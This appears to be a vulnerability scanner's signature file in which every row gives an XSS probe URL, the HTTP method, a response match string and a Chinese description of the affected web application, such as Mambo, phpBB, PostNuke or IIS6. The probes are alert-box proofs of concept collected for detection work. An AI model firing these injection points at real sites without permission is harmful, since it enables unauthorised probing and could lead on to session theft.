701#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/emailfriend/emailnews.php?id=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
702#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/emailfriend/emailfaq.php?id=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
703#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/emailfriend/emailarticle.php?id=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
704#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/administrator/upload.php?newbanner=1&choice=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
705#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/administrator/popups/sectionswindow.php?type=web&link=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
706#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/administrator/gallery/view.php?path=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
707#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/administrator/gallery/uploadimage.php?directory=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
708#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/administrator/gallery/navigation.php?directory=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
709#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/administrator/gallery/gallery.php?directory=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
714#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/upload.php?type=\<script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Mambo PHP Portal/Server易于受到跨站脚本（XSS）攻击。#d9Fa0j#
715#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/soinfo.php?\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#The PHP script soinfo.php易于受到跨站脚本（XSS）攻击。在php.ini中设置expose_php = Off。#d9Fa0j#
718#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script+>#d9Fa0j#Postnuke易于受到跨站脚本（XSS）攻击。CA-2000-02。#d9Fa0j#
730#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Windows 2003上的IIS6服务器易受到某些错误信息中的XSS的攻击。CA-2000-02。#d9Fa0j#
731#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/SiteServer/Knowledge/Default.asp?ctr=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#网站服务器易受到XSS的攻击。#d9Fa0j#
732#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/_mem_bin/formslogin.asp?\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#网站服务器易受到XSS的攻击。#d9Fa0j#
739#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSYaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#YaBB 1 Gold SP1和早期版本易受到XSS的攻击。CA-2000-02。#d9Fa0j#
740#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSvq/demos/respond.pl?<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#vqServer(快速的网络服务器)的默认的CGI文件易受到XSS的攻击，应删除所有默认的CGI文件。CA-2000-02。#d9Fa0j#
741#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSviewcvs.cgi/viewcvs/viewcvs/?sortby=rev\><script>alert('Vulnerable')</script>;"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#从ViewCVS v0.9.2 viewcvs.sourceforge.net下有容易跨站脚本(XSS)。 升级到最新版本。CA- 2000 - 02。#d9Fa0j#
742#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSviewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#从ViewCVS v0.9.2 viewcvs.sourceforge.net下有容易跨站脚本(XSS)。 升级到最新版本。CA- 2000 - 02。#d9Fa0j#
744#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRStest-cgi.exe?<script>alert(document.cookie)</script>#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#默认的CGI文件易受到XSS的攻击。CA-2000-02。#d9Fa0j#
746#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSsearch.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#来自于 http://www.xav.com/ 的Fluid Dynamics FD 搜索引擎，易受到XSS的攻击。CA-2000-02，应升级到FDSE版本 2.0.0.0055。#d9Fa0j#
747#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSsearch.php?searchstring=<script>alert(document.cookie)</script>#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Gallery 1.3.4和以下版本易受到XSS攻击，应神接到最新版本。BID-8288。#d9Fa0j#
752#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSFormMail.cgi?<script>alert(\Vulnerable\");</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\Vulnerable\");</script>"#d9Fa0j#FormMail.cgi允许XSS。CA-2000-02#d9Fa0j#
753#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Faq-O-Matic易受到XSS攻击。CA-2000-02。应从 http://faqomatic.sourceforge.net/fom-serve/cache/1.html上更新。#d9Fa0j#
754#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Faq-O-Matic容易跨站脚本(XSS)。 http://sourceforge.net/projects/faqomatic升级到最新的产品。 CA- 2000 - 02。#d9Fa0j#
757#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable');</script>#d9Fa0j#CensorNet 代理服务易受到错误页面中的XSS的攻击。CA-2000-02。#d9Fa0j#
758#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#这个CGI易受到XSS的攻击。CA-2000-02。#d9Fa0j#
759#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j# http://www.bbc.co.uk/education/betsie/上的BBC Education Text to Speech Internet Enhancer允许XSS。CA-2000-02。#d9Fa0j#
760#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j# http://www.mewsoft.com/ 上的Mewsoft Auction 3.0易受到XSS的攻击。CA-2000-02。#d9Fa0j#
762#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Cobalt RaQ 4 administration CGI易受到XSS的攻击。CA-2000-02。#d9Fa0j#
764#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#XSS可与.aspx文件一起发送请求（可能是Microsoft .net）。CA-2000-02。#d9Fa0j#
769#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>"#d9Fa0j#GET#d9Fa0j#alert(\Vulnerable\")</script>"#d9Fa0j#PHP Web Chat2.0(PHP网页聊天工具)易受到XSS的攻击。CA-2000-02。#d9Fa0j#
788#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/servlet/custMsg?guestName=<script>alert(\Vulnerable\")</script>"#d9Fa0j#POST#d9Fa0j#<script>alert(\Vulnerable\")</script>"#d9Fa0j#Bajie HTTP JServer易受到XSS的攻击。CA-2000-02。#d9Fa0j#
789#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/servlet/CookieExample?cookiename=<script>alert(\Vulnerable\")</script>"#d9Fa0j#POST#d9Fa0j#<script>alert(\Vulnerable\")</script>"#d9Fa0j#Bajie HTTP JServer易受到XSS的攻击。CA-2000-02。#d9Fa0j#
791#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/search/index.cfm?<script>alert(\Vulnerable\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\Vulnerable\")</script>"#d9Fa0j#搜索引擎允许XSS的攻击。CA-2000-02。#d9Fa0j#
793#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/search.php?zoom_query=<script>alert(\hello\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\hello\")</script>"#d9Fa0j#Wrensoft Zoom搜索引擎易受到XSS的攻击。CA-2000-02。#d9Fa0j#
795#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/search.php?searchfor=\><script>alert('Vulnerable');</script>"#d9Fa0j#GET#d9Fa0j#alert('Vulnerable')#d9Fa0j#Siteframe 2.2.4易受到XSS的攻击。CA-2000-02。#d9Fa0j#
801#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\%3<script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Postnuke Phoenix 0.7.2.3易受到XSS的攻击。CA-2000-02。#d9Fa0j#
806#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#phpWebSite 0.9.x和以下版本易受到XSS的攻击。CA-2000-02。#d9Fa0j#
807#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\><script>alert('Vulnerable')</script>&MMN_position=[X:X]"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#phpWebSite 0.9.x和以下版本易受到XSS的攻击。CA-2000-02。#d9Fa0j#
808#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#phpWebSite 0.9.x和以下版本易受到XSS的攻击。CA-2000-02。#d9Fa0j#
809#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#phpWebSite 0.9.x和以下版本易受到XSS的攻击。CA-2000-02。#d9Fa0j#
810#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>"#d9Fa0j#GET#d9Fa0j#alert(\Vulnerable\")</script>"#d9Fa0j#PHP Web Chat 2.0易受到XSS的攻击。CA-2000-02。#d9Fa0j#
818#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/phpBB/viewtopic.php?t=17071&highlight=\>\"<script>javascript:alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>javascript:alert(document.cookie)</script>#d9Fa0j#phpBB易受到XSS的攻击。CA-2000-02。#d9Fa0j#
826#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/node/view/666\><script>alert(document.domain)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.domain)</script>#d9Fa0j#Drupal 4.2.0 RC易受到XSS的攻击。#d9Fa0j#
834#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/msadm/user/login.php3?account_name=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#The Sendmail Server 网站用户登录易受到XSS的攻击。CA-2000-02。#d9Fa0j#
835#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/msadm/site/index.php3?authid=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#The Sendmail Server 网站管理员登陆易受到XSS的攻击。CA-2000-02。#d9Fa0j#
836#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/msadm/domain/index.php3?account_name=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#The Sendmail Server 网站域名管理员登陆易受到XSS的攻击。CA-2000-02。#d9Fa0j#
841#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/modules/Forums/bb_smilies.php?bgcolor1=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#PHP-Nuke 6.0易受到XSS的攻击。CA-2000-02。#d9Fa0j#
864#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\Vulnerable\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\Vulnerable\")</script>"#d9Fa0j#IBM Directory Server 4.1 Web Admin,ldacgi.exe易受到XSS的攻击。#d9Fa0j#
870#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/index.php?file=Liens&op=\><script>alert('Vulnerable');</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable');</script>#d9Fa0j#Nuked-klan 1.3b易受到XSS的攻击。CA-2000-02。#d9Fa0j#
873#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/index.php?action=search&searchFor=\><script>alert('Vulnerable')</script >"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#MiniBB http://www.minibb.net易受到XSS的攻击。CA-2000-02。#d9Fa0j#
874#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/index.php/\><script><script>alert(document.cookie)</script><"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#eZ发布的v3和prior允许XSS。CA-2000-02。#d9Fa0j#
882#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/gallery/search.php?searchstring=<script>alert(document.cookie)</script>#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Gallery 1.3.4和以下版本易受到XSS的攻击，应更新到最新版本。BID-8288。#d9Fa0j#
900#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>"#d9Fa0j#GET#d9Fa0j#alert(\Vulnerable\")</script>"#d9Fa0j#PHP Web Chat 2.0 易受到XSS的攻击。CA-2000-02。#d9Fa0j#
906#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/ca000007.pl?ACTION=SHOWCART&REFPAGE=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Actinic E-Commerce services易受到XSS的攻击。CA-2000-02。#d9Fa0j#
907#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/ca000001.pl?ACTION=SHOWCART&hop=\><script>alert('Vulnerable')</script>&PATH=acatalog%2f"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Actinic E-Commerce services易受到XSS的攻击。CA-2000-02。#d9Fa0j#
1205#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/mailman/admin/ml-name?\><script>alert('Vulnerable')</script>;"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Mailman邮件系统有跨站脚本攻击威胁（XSS）,CA-2000-02#d9Fa0j#
1230#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/\><img%20src=\"javascript:alert(document.domain)\">"#d9Fa0j#GET#d9Fa0j#<img src=\javascript:alert(document.domain)\">"#d9Fa0j#IBM的交换网络缓存代理有跨站脚本(XSS)漏洞,CA-2000-02#d9Fa0j#
1369#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/index.php?err=3&email=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#MySQL Eventum在邮件上有XSS跨站脚本漏洞#d9Fa0j#
1370#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/forgot_password.php?email=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#MySQL Eventum在邮件上有XSS跨站脚本漏洞#d9Fa0j#
1371#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/bugs/index.php?err=3&email=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#MySQL Eventum在邮件上有XSS跨站脚本漏洞#d9Fa0j#
1372#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/bugs/forgot_password.php?email=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#MySQL Eventum在邮件上有XSS跨站脚本漏洞#d9Fa0j#
1373#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/eventum/index.php?err=3&email=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#MySQL Eventum在邮件上有XSS跨站脚本漏洞#d9Fa0j#
1374#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/eventum/forgot_password.php?email=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#MySQL Eventum在邮件上有XSS跨站脚本漏洞#d9Fa0j#
1446#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/login/sm_login_screen.php?error=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#SPHERA HostingDirector and Final User (VDS)控制面板1-3版本有多跨站脚本攻击（XSS）漏洞，CA-2000-02.#d9Fa0j#
1447#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/login/sm_login_screen.php?uid=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#SPHERA HostingDirector and Final User (VDS)控制面板1-3版本有多跨站脚本攻击（XSS）漏洞，CA-2000-02.#d9Fa0j#
1448#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/SPHERA/login/sm_login_screen.php?error=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#SPHERA HostingDirector and Final User (VDS)控制面板1-3版本有多跨站脚本攻击（XSS）漏洞，CA-2000-02.#d9Fa0j#
1449#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/SPHERA/login/sm_login_screen.php?uid=\><script>alert('Vulnerable')</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#SPHERA HostingDirector and Final User (VDS)控制面板1-3版本有多跨站脚本攻击（XSS）漏洞，CA-2000-02.#d9Fa0j#
1450#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/acart2_0/signin.asp?msg=<script>alert(\test\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\test\")</script>"#d9Fa0j#Ward A-Cart 2.0包含一些XSS的漏洞#d9Fa0j#
1477#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/index.php?vo=\><script>alert(document.cookie);</script>"#d9Fa0j#GET#d9Fa0j#><script>alert(document.cookie);</script>#d9Fa0j#Ralusp Sympoll 1.5是容易跨站脚本(XSS)。 CA- 2000 - 02。#d9Fa0j#
1494#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#VP-ASP商城购物车系统4.x版本shopdisplayproducts.asp文件存在XSS跨站脚本漏洞。#d9Fa0j#
2995#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\>\"<script>javascript:alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>javascript:alert(document.cookie)</script>#d9Fa0j#Vbulletin 2.2.9及以下的版本容易受到跨站脚本攻击（XSS）。A-2000-02。#d9Fa0j#
2996#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/search.asp?Search=\>&lt;script&gt;alert(Vulnerable)&lt;/script&gt;"#d9Fa0j#GET#d9Fa0j#>&lt;script&gt;alert()&lt;/script&gt;#d9Fa0j#Max Web Portal网站系统很容易受到跨站脚本攻击（XSS）。CA-2000-02。#d9Fa0j#
3014#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\><script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#GET/system/status/session#d9Fa0j#发现跨站#d9Fa0j#
3015#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/theme1/selector?button=status,monitor,session&button_url=/system/status/status\><script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#/system/status/session"#d9Fa0j#发现跨站#d9Fa0j#
3016#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/theme1/selector?button=status,monitor,session\><script>alert('Vulnerable')</script>&button_url=/system/status/status#d9Fa0j#GET#d9Fa0j#/system/status/session"#d9Fa0j#发现跨站#d9Fa0j#
3095#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/webcalendar/week.php?user=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Webcalendar0.9.42及以下版本很容易受到跨站点脚本攻击（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3099#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/debug/dbg?host==<script>alert('Vulnerable');</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable');</script>#d9Fa0j#TCLHttpd 3.4.2 服务在调试脚本中很容易收到跨站脚本攻击（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3101#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/debug/errorInfo?title===<script>alert('Vulnerable');</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable');</script>#d9Fa0j#TCLHttpd 3.4.2 服务在调试脚本中很容易收到跨站脚本攻击（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3102#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/debug/showproc?proc===<script>alert('Vulnerable');</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable');</script>#d9Fa0j#TCLHttpd 3.4.2 服务在调试脚本中很容易收到跨站脚本攻击（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3147#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/addressbook.php?\><script>alert(Vulnerable)</script><!--"#d9Fa0j#GET#d9Fa0j#<script>alert(Vulnerable)</script>#d9Fa0j#Squirrel Mail 1.2.7存在跨站脚本攻击漏洞（XSS），请参考 CA-2000-02 。#d9Fa0j#
3162#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/acart2_0/deliver.asp?msg=<script>alert(\test\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\test\")</script>"#d9Fa0j#Alan Ward A-Cart 2.0 包含几个跨站脚本漏洞（XSS）。#d9Fa0j#
3163#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/acart2_0/error.asp?msg=<script>alert(\test\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\test\")</script>"#d9Fa0j#Alan Ward A-Cart 2.0 包含几个跨站脚本漏洞（XSS）。#d9Fa0j#
3164#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/acart2_0/admin/error.asp?msg=<script>alert(\test\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\test\")</script>"#d9Fa0j#Alan Ward A-Cart 2.0 包含几个跨站脚本漏洞（XSS）。#d9Fa0j#
3165#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/acart2_0/admin/index.asp?msg=<script>alert(\test\")</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(\test\")</script>"#d9Fa0j#Alan Ward A-Cart 2.0 包含几个跨站脚本漏洞（XSS）。#d9Fa0j#
3228#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRStestcgi.exe?<script>alert(document.cookie)</script>#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Sambar Server的默认脚本存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-20 。#d9Fa0j#
